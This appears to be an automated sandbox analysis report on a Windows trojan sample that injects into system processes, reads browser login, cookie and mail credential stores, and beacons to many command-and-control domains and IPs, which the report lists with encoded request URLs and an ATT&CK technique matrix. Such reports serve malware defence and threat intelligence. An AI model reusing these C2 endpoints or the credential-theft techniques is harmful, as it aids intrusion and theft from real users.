      Source: RAVCpl64.exe, 00000012.00000000.1269474628.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000002.5816935645.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000000.1278671586.0000000000DC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: RAVCpl64.exe, 00000012.00000000.1269474628.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000002.5816935645.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000012.00000000.1278671586.0000000000DC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,2_2_00405D1B

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      1
      OS Credential Dumping
      3
      File and Directory Discovery
      Remote Services1
      Archive Collected Data
      Exfiltration Over Other Network Medium3
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules
      1
      Windows Service
      1
      Access Token Manipulation
      3
      Obfuscated Files or Information
      LSASS Memory5
      System Information Discovery
      Remote Desktop Protocol1
      Data from Local System
      Exfiltration Over Bluetooth21
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Windows Service
      1
      Software Packing
      Security Account Manager121
      Security Software Discovery
      SMB/Windows Admin Shares1
      Email Collection
      Automated Exfiltration4
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)712
      Process Injection
      1
      DLL Side-Loading
      NTDS12
      Virtualization/Sandbox Evasion
      Distributed Component Object Model1
      Clipboard Data
      Scheduled Transfer15
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading
      LSA Secrets2
      Process Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common12
      Virtualization/Sandbox Evasion
      Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Access Token Manipulation
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job712
      Process Injection
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 760810 Sample: Jjfmcz1Hsz.exe Startdate: 05/12/2022 Architecture: WINDOWS Score: 100 31 xn--29-oj9ik7b890b.net 2->31 33 www.youlian.fund 2->33 35 24 other IPs or domains 2->35 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 4 other signatures 2->53 10 Jjfmcz1Hsz.exe 2 33 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 65 Tries to detect Any.run 10->65 14 Jjfmcz1Hsz.exe 6 10->14         started        signatures6 process7 dnsIp8 43 googlehosted.l.googleusercontent.com 142.250.184.225, 443, 49823 GOOGLEUS United States 14->43 45 drive.google.com 172.217.23.110, 443, 49821 GOOGLEUS United States 14->45 67 Modifies the context of a thread in another process (thread injection) 14->67 69 Tries to detect Any.run 14->69 71 Maps a DLL or memory area into another process 14->71 73 2 other signatures 14->73 18 RAVCpl64.exe 14->18 injected signatures9 process10 process11 20 help.exe 13 18->20         started        signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Writes to foreign memory regions 20->59 61 3 other signatures 20->61 23 explorer.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.youlian.fund 154.204.24.45, 49842, 49843, 49844 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 23->37 39 royaltechglobal.com 192.185.32.157, 49847, 49848, 49849 UNIFIEDLAYER-AS-1US United States 23->39 41 15 other IPs or domains 23->41 63 System process connects to network (likely due to code injection or exploit) 23->63 signatures15

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Jjfmcz1Hsz.exe46%VirustotalBrowse
      Jjfmcz1Hsz.exe38%ReversingLabsWin32.Trojan.NSISInject
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsl1543.tmp\System.dll0%ReversingLabs
      SourceDetectionScannerLabelLinkDownload
      11.0.Jjfmcz1Hsz.exe.400000.1.unpack100%AviraHEUR/AGEN.1223491Download File
      11.0.Jjfmcz1Hsz.exe.400000.3.unpack100%AviraHEUR/AGEN.1223491Download File
      2.0.Jjfmcz1Hsz.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      30.2.firefox.exe.28e93814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      2.2.Jjfmcz1Hsz.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      30.0.firefox.exe.28e93814.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      11.0.Jjfmcz1Hsz.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
      30.0.firefox.exe.28e93814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      29.0.explorer.exe.13e83814.2.unpack100%AviraTR/Patched.Ren.GenDownload File
      19.2.help.exe.34b0910.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      11.0.Jjfmcz1Hsz.exe.400000.2.unpack100%AviraHEUR/AGEN.1223491Download File
      29.0.explorer.exe.13e83814.1.unpack100%AviraTR/Patched.Ren.GenDownload File
      19.2.help.exe.3c73814.4.unpack100%AviraTR/Patched.Ren.GenDownload File
      29.0.explorer.exe.13e83814.0.unpack100%AviraTR/Patched.Ren.GenDownload File
      SourceDetectionScannerLabelLink
      botbillionsblaze.website1%VirustotalBrowse
      www.phootka.ru2%VirustotalBrowse
      www.youlian.fund1%VirustotalBrowse
      www.t1fbrc.com0%VirustotalBrowse
      xn--29-oj9ik7b890b.net2%VirustotalBrowse
      www.funknive.ch2%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
      http://www.005404.com/nqhc/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/nqhc/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/7985/headerstrip.gif)0%Avira URL Cloudsafe
      http://www.botbillionsblaze.website/nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX100%Avira URL Cloudmalware
      http://www.gumba.shop/nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://www.royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://www.royaltechglobal.com/nqhc/0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-json/0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://schemas.microso~m0%Avira URL Cloudsafe
      http://royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPm0%Avira URL Cloudsafe
      http://www.gouldent.site/nqhc/0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/8934/frt_arr.jpg)0%Avira URL Cloudsafe
      https://word.office.comy0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/7985/netsol-logos.jpg0%Avira URL Cloudsafe
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Best_Penny_Stocks.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRK0%Avira URL Cloudsafe
      http://www.apidachicago.org/nqhc/0%Avira URL Cloudsafe
      http://www.searchbot.su/nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IX100%Avira URL Cloudmalware
      http://www.wellnessprodia.com/nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/comments/feed/0%Avira URL Cloudsafe
      http://www.Pinwheeleffect.org0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/8934/srch-bg.gif)0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Migraine_Pain_Relief.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliW0%Avira URL Cloudsafe
      http://www.phootka.ru/nqhc/?7nWHV=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Health_Insurance.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/feed/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Best_Mortgage_Rates.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWx0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe
      http://www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/8934/rcomlogo.jpg0%Avira URL Cloudsafe
      http://www.005404.com/nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://www.youlian.fund/nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://www.gumba.shop/nqhc/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/nqhc/?7nWHV=5+D/AEotBIiARx+RPOYdHDoSCIwvlBfWKmb14ofQdN1lqNdZOlbl7P8VoNd3a3Fenblb13q2VSw+uZcH+Wrp87x4A2/T8XiFdA==&jP1=y48xBzJ0mzz0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Parental_Control.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/Accident_Lawyers.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKR0%Avira URL Cloudsafe
      www.xiaoxiuzhen.com/nqhc/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/High_Speed_Internet.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWx0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.30%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/music_videos.cfm?fp=oTSDZKU%2B0iibnvnGRZVQNnk%2BJyUzFuBOGaWliWxRKRoC9f0%Avira URL Cloudsafe
      https://dts.gnpge.com0%Avira URL Cloudsafe
      http://www.youlian.fund/nqhc/0%Avira URL Cloudsafe
      http://www.xn--29-oj9ik7b890b.net/nqhc/?7nWHV=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&t0D=yFNHS0IX0%Avira URL Cloudsafe
      http://i3.cdn-image.com/__media__/pics/8932/arrows.jpg)0%Avira URL Cloudsafe
      http://xn--299aa717y.xn--3e0b707e/0%Avira URL Cloudsafe
      http://www.popular.directory/nqhc/0%Avira URL Cloudsafe
      http://www.funknive.ch/nqhc/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/px.js?ch=20%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/px.js?ch=10%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.xiaoxiuzhen.com/nqhc/0%Avira URL Cloudsafe
      http://www.pinwheeleffect.org/display.cfm0%Avira URL Cloudsafe
      http://www.botbillionsblaze.website/nqhc/100%Avira URL Cloudmalware
      http://www.phootka.ru/nqhc/0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      botbillionsblaze.website
      2.57.90.16
      truetrueunknown
      www.phootka.ru
      195.24.68.23
      truetrueunknown
      xn--29-oj9ik7b890b.net
      50.87.192.144
      truetrueunknown
      www.youlian.fund
      154.204.24.45
      truetrueunknown
      www.xiaoxiuzhen.com
      38.55.15.214
      truetrue
        unknown
        www.searchbot.su
        45.130.41.24
        truetrue
          unknown
          www.005404.com
          103.63.2.175
          truetrue
            unknown
            www.popular.directory
            64.190.63.111
            truetrue
              unknown
              www.t1fbrc.com
              103.91.8.90
              truetrueunknown
              www.funknive.ch
              185.101.158.239
              truetrueunknown
              www.gouldent.site
              66.29.151.40
              truetrue
                unknown
                royaltechglobal.com
                192.185.32.157
                truetrue
                  unknown
                  drive.google.com
                  172.217.23.110
                  truefalse
                    high
                    www.labour-office.com
                    198.58.118.167
                    truetrue
                      unknown
                      wellnessprodia.com
                      192.232.217.125
                      truetrue
                        unknown
                        www.gumba.shop
                        75.2.81.212
                        truetrue
                          unknown
                          www.apidachicago.org
                          194.245.148.189
                          truetrue
                            unknown
                            www.pinwheeleffect.org
                            208.91.197.39
                            truetrue
                              unknown
                              googlehosted.l.googleusercontent.com
                              142.250.184.225
                              truefalse
                                high
                                www.wellnessprodia.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.botbillionsblaze.website
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.noprostatit.store
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.royaltechglobal.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.westinotion.tech
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.xn--29-oj9ik7b890b.net
                                          unknown
                                          unknowntrue
                                            unknown
                                            doc-0g-7s-docs.googleusercontent.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.royaltechglobal.com/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.pinwheeleffect.org/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.botbillionsblaze.website/nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.gumba.shop/nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.005404.com/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.apidachicago.org/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.gouldent.site/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.searchbot.su/nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.wellnessprodia.com/nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.phootka.ru/nqhc/?7nWHV=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.gumba.shop/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.005404.com/nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.youlian.fund/nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              www.xiaoxiuzhen.com/nqhc/true
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.pinwheeleffect.org/nqhc/?7nWHV=5+D/AEotBIiARx+RPOYdHDoSCIwvlBfWKmb14ofQdN1lqNdZOlbl7P8VoNd3a3Fenblb13q2VSw+uZcH+Wrp87x4A2/T8XiFdA==&jP1=y48xBzJ0mzztrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.xn--29-oj9ik7b890b.net/nqhc/?7nWHV=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&t0D=yFNHS0IXtrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.youlian.fund/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.popular.directory/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.funknive.ch/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.xiaoxiuzhen.com/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.botbillionsblaze.website/nqhc/true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.phootka.ru/nqhc/true
                                              • Avira URL Cloud: safe
                                              unknown
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://i3.cdn-image.com/__media__/pics/7985/headerstrip.gif)help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/chrome_newtabhelp.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drfalse
                                                high
                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchhelp.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drfalse
                                                    high
                                                    https://doc-0g-7s-docs.googleusercontent.com/bJjfmcz1Hsz.exe, 0000000B.00000002.1324818516.00000000017FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.networksolutions.com/legal/static-service-agreement.jsphelp.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1650696927.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1582853419.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1724750579.0000000009848000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1444672750.0000000009848000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://xn--299aa717y.xn--3e0b707e/wp-json/help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.nic.ru/help.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 0000001D.00000000.1482349161.0000000010048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680456207.0000000010048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://excel.office.comexplorer.exe, 0000001D.00000000.1734878004.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1479232269.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607377108.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1660900795.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1590839096.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1455985675.000000000D05C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1678904598.000000000FF1B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDJjfmcz1Hsz.exe, 0000000B.00000001.981233524.0000000000626000.00000008.00000001.01000000.00000006.sdmpfalse
                                                                high
                                                                https://js.users.51.la/21461531.jshelp.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.gopher.ftp://ftp.Jjfmcz1Hsz.exe, 0000000B.00000001.981436197.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://royaltechglobal.com/nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmhelp.exe, 00000013.00000002.5836164639.00000000044EC000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
